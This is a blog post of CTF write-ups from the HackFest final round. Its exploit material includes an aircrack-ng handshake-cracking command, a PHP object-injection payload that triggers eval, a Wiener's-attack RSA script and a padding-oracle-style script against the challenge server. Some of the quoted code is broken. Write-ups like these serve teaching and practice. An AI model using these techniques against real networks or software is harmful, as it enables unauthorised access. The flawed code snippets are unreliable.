HackFest_CTF{Final_R0und_Writeups}

7:31:00 AM Unknown 1 Comments


For10 ,Forensic,10 pt {by BilelKor}

We were given a packet capture containing a wifi handshake .The first thing we want to do is to open up this file in Wireshark. Once this file is open, we can see that we indeed have a wireless frames from which we need to extract the key password . All we need is to crack the password  ,using Aircrack and rockyou worldlist.

aircrack-ng for10.cap -w rockyou-10.txt
Here am using diffrent parts of the rockyou word list ,you can download the full list from this link http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt


The flag is : hackfest{jennifer}
Rev10 ,Reverse , 10 pt {by S0ld1er}
You can easily get the flag using strings and grep 

strings rev10.exe | grep "hack"



The flag is : hackfest{f1ae14dfb0f46fc4ab1998fe98bc51c8}
web50 ,Web ,50 pt {by Chouaib}

Honestly i forget the task what said exactly , but the topic is to get the Flag , so let move to the php code source to see how it works . Code : 
<?php
function print_flag(){
    print file_get_contents('/var/www/flag.txt');

}
class Hackfest
{     private $hook;
    function __toString();
    {   if (isset($this->hook)) eval($this->hook);
    }
}
if(!empty($GET_['msg'])){
    $user_date = unserialize($GET['msg']);
}

?>
Hello!

Humm , so as i see there is a parameter 'mgs' using GET Method and Unserialize() function , so quickly view how it works in php.net .



As we can see there is  a Warning about using this function to expose PHP Object Injection , Ref: https://www.owasp.org/index.php/PHP_Object_Injection .

 Let's exploit it and get the flag, Rule:

O::"":1:{s::"";s:length_file:"file";}
So ,I generate my payload: 

   O:8:"Hackfest":1:{s:14:"Hackfest hook";s:13:"print_flag();";}
and then i encoded it with url_encode what gave me the flag :

O%3A8%3A%22Hackfest%22%3A1%3A%7Bs%3A14%3A%22Hackfest%20hook%22%3Bs%3A1
3%3A%22print_flag()%3B%22%3B%7D%20

Forensic Malware Analysis ,50 pt {by Chouaib }
This task is talking about to analysis this malware they gave us to get IP and Port which connected with , so ,I have some problem with virtual machine to run it there , so I searched for malware analysis tools online . 

 At last i got one website to online malware analysis which gave me Traffic Packet file then with simple analysis I have noticed this weird connection 
 "From IP:1028 to 193.95.68.245:81" so this the flag : hackfest{193.95.68.245:81}
Crypto10 ,Cryptography, 10 pt {by Aymen Borgi}
At the first sight ,I thought about XOR encryption that's why finding the key was my first goal, it was very easy to find .


EE was reapeted many times in the signature of the file that's why I thought that EE is our key ,so,we wrote this dirty code :

b = bytearray(open('crypto10.enc', 'rb').read())
l=0xEE
for i in range(len(b)):
    b[i] ^= l
open('b', 'wb').write(b)
and finaly we got a picture contain the flag :D

Rev50 ,Reverse , 50 pt {by Aymen Borgi}
The idea was very sample , using jd-gui to decompile the file , then looking at the java code the program uses xor encryption to encrypt elements of 2 tables .so we wrote this python script to get the flag 

a = [114, 121, 126, 116, 115, 114, 109, 110, 98, 41, 122, 43, 125, 25, 41, 126, 46, 45, 123, 45, 39, 41, 45, 35, 66, 45, 47, 38, 43, 122, 47, 120, 35, 122, 33, 70, 126, 33, 47, 34, 112, 100]
b = [26, 24, 29, 31, 21, 23, 30, 26, 25, 31, 30, 30, 28, 32, 30, 31, 29, 21, 30, 31, 21, 30, 20, 21, 32, 29, 24, 23, 24, 31, 22, 25, 26, 28, 21, 32, 24, 21, 30, 20, 21, 25]
l=[]
for i in range(len(a)):
    l.append(chr(a[i] ^ b[i]))

print ''.join(l)

and finally we got the flag : hackfest{6d5a97a38e22796b0713e9a9f4ff416e} 
Only your gun to solve this challenge is understanding java that's all ;)

Crypto75 ,Cryptography , 75 pt {by Bilel Korbosli}
We have already solved this challenge before ,edit the source code and change it a little bit  .
Check out our previous write up about this challenge http://0xbugsbunny.blogspot.com/2016/08/icectfStage3l33tcrypt.html
Code : 

import socket
import base64

def netcat(hostname, port, content):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    data = s.recv(1024)
    s.sendall(content)
    s.shutdown(socket.SHUT_WR)
    data = s.recv(220)
    s.close()
    return data
    
sd="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
a=['0','1','2','3','4','5','6','7','8','9','a','b','c','e','f']
for j in range(112):
 sd=sd[:len(sd)-1]
 dt = base64.b64encode(sd)
 f1 = netcat("challenge.hackfest.tn",3001,dt+"\n")
 f1 =f1[:-2]
 f1 = base64.b64decode(f1).encode('hex')[:224]
 print '::'+f1
 for k in a:
  dt = base64.b64encode(sd+flag+k)
  f2 = netcat("challenge.hackfest.tn",3001,dt+"\n")
  f2 = f2[:-2]
  print str(chr(k))
  f2 = base64.b64decode(f2).encode('hex')[:224]
  if f2 == f1 :
   flag += str(chr(k))
   break
 print "flag : "+flag+"\n"
 #flag ="25583d232ef6b1cafbc32f0a947a60ba"
Crypto50 ,Cryptography , 50 pt {by Bilel Korbosli}

We were given an e,c ,n it's obviously RSA-Winners attack . 

#!/usr/bin/python  
import ContinuedFractions, Arithmetic  
import time  
import sys  
import base64  
import binascii  
import gmpy  
import sympy  
import math  
import fractions  
import struct  
sys.setrecursionlimit(100000)  
# modulus from the RSA public key  
n=0x331702c5fe01f2401c9e44ec0ba79e4fc0c1a8498b27a7433f54381f6be8cbb339246020716082c3ebe83ba3e6af2feb5468332ae27e1dd5bcc82d9201aba81c1c90c1edebbb0661b8a0a38739ccbcfd933f0323883b6379ffa62a5d71e406b7c3ba6314c49eaf0d70be47210d22a8baae4be89d8db620cb976d032a29ac3bc771334e80479f54b07a39a6791bb434b713d6a3f428612404a55cb3a787e5d13e26eae8beb8b52e4f724a83eb04230fac17aced7dece0b7ed44da60ece5ddf67c727dd83a5e8a0cf24303856ac41eaed01c82577fdf0761e31bfcc3b51227cef59c5dd154ba8a616eddc2cc1bd86fd04facd29a76af6482cb1cdcecfeedf3ec989633848f6e662fd7a5dbcd5603534d463c87884053ea56c29849bc34f9eac4cea4e76a2a28bbd3ae352f1b65f4103f37d7276d02edc14ec3616a570fa86e68ba0b8aaf7573572481cdf826565f0231fc8d9948e0420821844238a794fba9674a77b81a5e60963920fbb5e8220ce1ab189be0db33ed9444a011e1f6b09e6e83dec67a6bcc67e5e6ced247aa2af1189d31f55ad43302f31971aaf4cdaa2d8f91ba0db625845b0c6712998e1655643bda5ac7177a6ea5014f73615b25958b959a78550eb8378177c3cf23f9f882b17f2c9d71fce410295f7b1dcfa439da0a8e1548017a888b202a3c6c504acacb743b5c8719a69b653687feb1a25682a5b057d7579
# exponent from the RSA public key  
e=0x2c398be3121d210e2f54dba688a0f16275adcbb1f2c0337a6d52c6eb0f7c86057337e5125a707ae5c24918e387a7cbcd5035120d0a0ebea4a4b3eb4c5dc93d7baacbc1e33e10d734b15f184fa9d00707f9d34446c0b380254e834bd1208473c1b4694750dbe9b2ba74157eec537d53279f2894232f256b98b916a50b7895d404e495f84457fd599e5fb3b84d32d2973be79c549aac88a9e7cfb8208a125c3da6efb66f84fabc1d97da5bdc45c37c1ef73c3f950bba9cb26baa047a72693d0c3fdd038cf348b532737237dc7a4bd5533e47ae9c3fed6e463d98b67f0abb465643c3e5c07d7940d2ff3ea2685e1ac5a2ee30088017f7db15761874a67c0a687a89c1200d3858bad042e4174fc04cb3ca586d76e0a764a76e00b78fa32c9aa2ad049dd7782929845d682568ff57f7b6bb75c725e7b3ab03fbea276e523a4c1e16019b8c2a6cd9b610df24279661e3a188e8434dec2a8b828fdb6ecffe9fbbb10297ca22399b12059df442b4cf3c2b4c40fb4cb0ee6d4e55bebd3b053980dfee2dd448c2ba40fcaf33145b9e0f85f4463f4c140d3a844b7bae984adda02a9351d71d6885dad5ebee5c69910c918b5e6dca28a0f4298280f1b87b53e4f7915177a091f22f2cd6adc39ad76a1db15c701a1e9d5a8ee6b679630544ba11bea1fcb5b043cd5cedd93ce3b9d4326040ede6c669dc7aa2e017f2ada73c7283eb124aac8728b
c=0x3e988e36b1bacb70da1464ee98a1679f55c73be7e8d3a69c1d107b54bb47bd44a5b0575fb003124c94d63bacb7148fcce143074cf5e4f61b23cd7e1bca2ed087aa2c275a2cfc6e517fa45680f1fed33ba4d646e8cc235bafca6446b4c584d959b0f1aec674d49238e35da1b5cec2b5c8f04840d69002a270ff1478eb7ecd0a87fd85b58d62e1b01f62466b8e55fedb1ca6ad4a0463d41f838ab7db9f5ffc0736438d2510931519d6727d1f38db0130d916de54793e56feb36910905cedd72c5679cffaaacd66be5b31b69c9f8f8435213dd57e646b9fe3c51b1fe932386ebe7116a12dbf661c24dff9b5d6b3e31bf409e0e54a63835365dff562bc8fa6643212586580d56081d96de852b0457c9b773756d7513e510824bdee43fc231ee1262a7a42f79110c37bc4b162d627b0fc34091cf8ee2c0d70cc650cc1260ca97c0e2b4e6e019fbee52cb42fd1ff35ea34c593ed49427c9d7231bace5aacc77d466d0fe478a773822b8851c15ac32368b4fdf6ed7a037b2f0d4e9b391ee187b5981664f4876559360537db6fc0c96ac69976ccce6350289f825554e704144937cded3b4611ddf8301626b2234092daf8dbd4d39c98ea0b1fed0006525a7d2b700194e3450c6000548dacd1a4935e8a03949d4a957b180c659f91cf34e5b29b47e1b4267ed037b5b7a290539fd752d22fda32e46ed4c3cd595687e8e2e26db8f9415794
def hack_RSA(e,n):  
  print "Performing Wiener's attack. Don't Laugh..."  
  time.sleep(1)  
  frac = ContinuedFractions.rational_to_contfrac(e, n)  
  convergents = ContinuedFractions.convergents_from_contfrac(frac)  
  for (k,d) in convergents:  
    #check if d is actually the key  
    if k!=0 and (e*d-1)%k == 0:  
      phi = (e*d-1)//k  
      s = n - phi + 1  
      # check if the equation x^2 - s*x + n = 0  
      # has integer roots  
      discr = s*s - 4*n  
      if(discr>=0):  
        t = Arithmetic.is_perfect_square(discr)  
        if t!=-1 and (s+t)%2==0:  
          return d  
hacked_d = hack_RSA(e, n)  
print "d=" + str(hacked_d)  
m = pow(c, hacked_d, n)  
print "So the flag is:"  
print("%0512x" %m).decode("hex")


Welcome ,Misc , -50 pt
Just DO_NOT_SUBMIT_THE_FLAG !!!!!!!! (thanks to our hero we got -50 pt -_- )
pwn50 , pwn ,50 pt {by Bilel Korbosli}
the task takes the first 8 numbers of the rand and saves the number in the 10th olace of the stack.

we solve it locally for the write-up ,we are sorry ,we forgot to save the flag in live session. 

Unknown

1 comment:

  1. UnknownApril 23, 2017 at 5:43 PM

    I am asking for the hero name <3 looool, Keep it up , one of the best team ever met

    ReplyDelete

Subscribe to: Post Comments (Atom)